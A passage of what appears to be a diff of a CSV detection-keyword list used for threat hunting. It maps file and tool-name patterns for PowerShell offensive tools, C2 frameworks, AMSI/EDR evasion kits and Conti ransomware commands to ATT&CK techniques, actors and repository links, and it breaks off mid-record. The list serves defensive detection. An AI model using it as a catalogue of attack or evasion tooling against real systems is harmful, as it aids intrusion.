T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PowershellAmsiGenerator*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*PowerShellArsenal*","offensive_tool_keyword","PowerShellArsenal","PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code. perform .NET malware analysis. analyze/scrape memory. parse file formats and memory structures. obtain internal system information. etc.","T1057 - T1053 - T1050 - T1564 - T1083 - T1003","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mattifestation/PowerShellArsenal","1","1","N/A","N/A","9","827","224","2021-08-20T08:41:50Z","2014-11-16T15:20:17Z" -"*PowerShellArtifactGenerator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*PowerShellArsenal*","offensive_tool_keyword","PowerShellArsenal","PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code. perform .NET malware analysis. analyze/scrape memory. parse file formats and memory structures. obtain internal system information. etc.","T1057 - T1053 - T1050 - T1564 - T1083 - T1003","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mattifestation/PowerShellArsenal","1","1","N/A","N/A","9","828","224","2021-08-20T08:41:50Z","2014-11-16T15:20:17Z" +"*PowerShellArtifactGenerator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*PowershellCradleGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PowerShellEmpire*","offensive_tool_keyword","empire","PowerShell offers a multitude of offensive advantages. including full .NET access. application whitelisting. direct access to the Win32 API. the ability to assemble malicious binaries in memory. and a default installation on Windows 7+. Offensive PowerShell had a watershed year in 2014. but despite the multitude of useful projects. many pentesters still struggle to integrate PowerShell into their engagements in a secure manner.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://www.powershellempire.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PowerShellExecuter.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*powershell-import *.ps1*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*powershell-import*Invoke-Kerberoast.ps1*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell-import*ShareFinder.ps1*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*PowershellKerberos-main*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*PowershellKerberos-main*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*PowerShellMafia*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PowerShellMafia/PowerSCCM*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" -"*PowerShellMafia/PowerSploit*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerShellMafia/PowerSploit*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerShellObfuscator.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" -"*PowershellRunner.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*PowershellRunner.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*PowerShellStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*PowerShell-Suite*","offensive_tool_keyword","PowerShell-Suite","There are great tools and resources online to accomplish most any task in PowerShell. sometimes however. there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.","T1059 - T1086 - T1140 - T1145 - T1216","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/PowerShell-Suite","1","1","N/A","N/A","10","2510","794","2021-11-19T12:18:24Z","2015-12-11T13:14:41Z" +"*PowerShell-Suite*","offensive_tool_keyword","PowerShell-Suite","There are great tools and resources online to accomplish most any task in PowerShell. sometimes however. there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.","T1059 - T1086 - T1140 - T1145 - T1216","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/PowerShell-Suite","1","1","N/A","N/A","10","2511","794","2021-11-19T12:18:24Z","2015-12-11T13:14:41Z" "*PowerShx.dll*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerShx.exe*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerShx.sln*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerShxDll.csproj*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerShx-master*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" -"*PowerSploit*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*PowerSploit-*.zip*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*PowerSploit.*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*PowerSploit/releases*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerSploit*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerSploit-*.zip*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerSploit.*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*PowerSploit/releases*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*powerstager*","offensive_tool_keyword","PowerStager","PowerStager: This script creates an executable stager that downloads a selected powershell payload.","T1105 - T1059.001 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/z0noxz/powerstager","1","1","N/A","N/A","2","181","59","2019-12-15T09:30:05Z","2017-04-17T12:13:31Z" -"*PowerUp.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*PowerUp.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1128","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PowerUp.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PowerUp.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1128","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*PowerUpSQL*","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1087 - T1059 - T1003 - T1078 - T1053 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","2182","456","2023-06-27T02:42:35Z","2016-06-22T01:22:39Z" "*PowerView.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*PowerView.ps1*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*powerview.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1078","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*PowerView.ps1*","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net commands. which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality It also implements various useful metafunctions. including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the 